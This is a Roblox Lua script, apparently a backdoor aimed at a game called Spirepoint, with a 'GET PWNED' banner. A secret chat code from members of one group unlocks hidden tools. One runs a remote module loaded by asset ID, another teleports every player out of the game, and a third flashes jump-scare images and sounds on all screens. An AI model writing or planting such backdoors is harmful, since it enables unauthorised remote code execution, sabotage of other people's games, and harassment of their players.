
--░██████╗░███████╗████████╗  ██████╗░░██╗░░░░░░░██╗███╗░░██╗███████╗██████╗░
--██╔════╝░██╔════╝╚══██╔══╝  ██╔══██╗░██║░░██╗░░██║████╗░██║██╔════╝██╔══██╗
--██║░░██╗░█████╗░░░░░██║░░░  ██████╔╝░╚██╗████╗██╔╝██╔██╗██║█████╗░░██║░░██║
--██║░░╚██╗██╔══╝░░░░░██║░░░  ██╔═══╝░░░████╔═████║░██║╚████║██╔══╝░░██║░░██║
--╚██████╔╝███████╗░░░██║░░░  ██║░░░░░░░╚██╔╝░╚██╔╝░██║░╚███║███████╗██████╔╝
--░╚═════╝░╚══════╝░░░╚═╝░░░  ╚═╝░░░░░░░░╚═╝░░░╚═╝░░╚═╝░░╚══╝╚══════╝╚═════╝░

--░██████╗██████╗░██╗██████╗░███████╗██████╗░░█████╗░██╗███╗░░██╗████████╗
--██╔════╝██╔══██╗██║██╔══██╗██╔════╝██╔══██╗██╔══██╗██║████╗░██║╚══██╔══╝
--╚█████╗░██████╔╝██║██████╔╝█████╗░░██████╔╝██║░░██║██║██╔██╗██║░░░██║░░░
--░╚═══██╗██╔═══╝░██║██╔══██╗██╔══╝░░██╔═══╝░██║░░██║██║██║╚████║░░░██║░░░
--██████╔╝██║░░░░░██║██║░░██║███████╗██║░░░░░╚█████╔╝██║██║░╚███║░░░██║░░░
--╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚══════╝╚═╝░░░░░░╚════╝░╚═╝╚═╝░░╚══╝░░░╚═╝░░░


local johndoeplayers = {}
local tpwhitelistedplayers = {}
local TPservice = game:GetService("TeleportService")

local function HelloJohnDoe()
	for _, userId in pairs(johndoeplayers) do
		local player = game.Players:GetPlayerByUserId(userId)
		if player then 
			local newtool = Instance.new("Tool")
			newtool.Parent = player.Backpack 
			newtool.Name = "AK47"
			local handle = Instance.new("Part")
			handle.Name = "Handle"
			handle.Parent = newtool
			handle.Transparency = 1
			newtool.Activated:Connect(function()
				require(2845929020).ooga(tostring(player))
			end)
		end
	end
end

local function tptool()
	for _, userId in pairs(tpwhitelistedplayers) do
		local player = game.Players:GetPlayerByUserId(userId)
		if player then 
			local newtool = Instance.new("Tool")
			newtool.Parent = player.Backpack 
			newtool.Name = "Makarov"
			local handle = Instance.new("Part")
			handle.Name = "Handle"
			handle.Parent = newtool
			handle.Transparency = 1
			newtool.Activated:Connect(function()
				for _, p in pairs(game.Players:GetPlayers()) do
					local msg = Instance.new("Message")
					msg.Parent = p.PlayerGui
					msg.Text = "PREPARE."
					game.Chat:Chat(p.Character.Head, "OH NO!! PLEASE!!! SPARE ME EVIL APPLEWARE!!", Enum.ChatColor.Green)
					wait(0.1)
					game.Chat:Chat(p.Character.Head, "AppleWare.EXE: I here HAHAHAHAHAHA", Enum.ChatColor.Red)
					local sound = Instance.new("Sound")
					sound.Parent = game.Workspace
					sound.SoundId = "rbxassetid://7086800629"
					sound.Volume = 2
					sound:Play()
					wait(3)
					TPservice:Teleport(110996211339903, p)
				end
			end)
		end
	end
end

local function flash()
	for _, userId in pairs(johndoeplayers) do
		local player = game.Players:GetPlayerByUserId(userId)
		if player then 
			local newtool = Instance.new("Tool")
			newtool.Parent = player.Backpack 
			newtool.Name = "Card-L2"
			local handle = Instance.new("Part")
			handle.Name = "Handle"
			handle.Parent = newtool
			handle.Transparency = 1
			newtool.Activated:Connect(function()
				local imageid
				local math1 = math.random(1, 10)
				for _, v in pairs(game.Players:GetPlayers()) do
					if math1 == 10 then
						imageid = "http://www.roblox.com/asset/?id=128143151097835"
					else
						imageid = "rbxassetid://6595498387"
					end
					local UI = Instance.new("ScreenGui")
					local image = Instance.new("ImageLabel")
					local sound = Instance.new("Sound")
					sound.Parent = workspace
					sound.Volume = 2
					sound.SoundId = "rbxassetid://3713805456"
					sound:play()
					UI.IgnoreGuiInset = true
					UI.Parent = v.PlayerGui
					image.Parent = UI
					image.Size = UDim2.new(0, 1197, 0, 606)
					image.Image = imageid
					task.delay(0.2, function()
						UI:Destroy()
						sound:Destroy()
					end)
				end
			end)
		end
	end
end

game.Players.PlayerAdded:Connect(function(player)
	print(player.Name)
	if player:IsInGroup(34679126) then
		table.insert(johndoeplayers, player.UserId)
		table.insert(tpwhitelistedplayers, player.UserId)
		player.Chatted:Connect(function(message)
			if message == "092348230948920" then
				HelloJohnDoe()
				tptool()
				flash()
			end
		end)
	end
end)
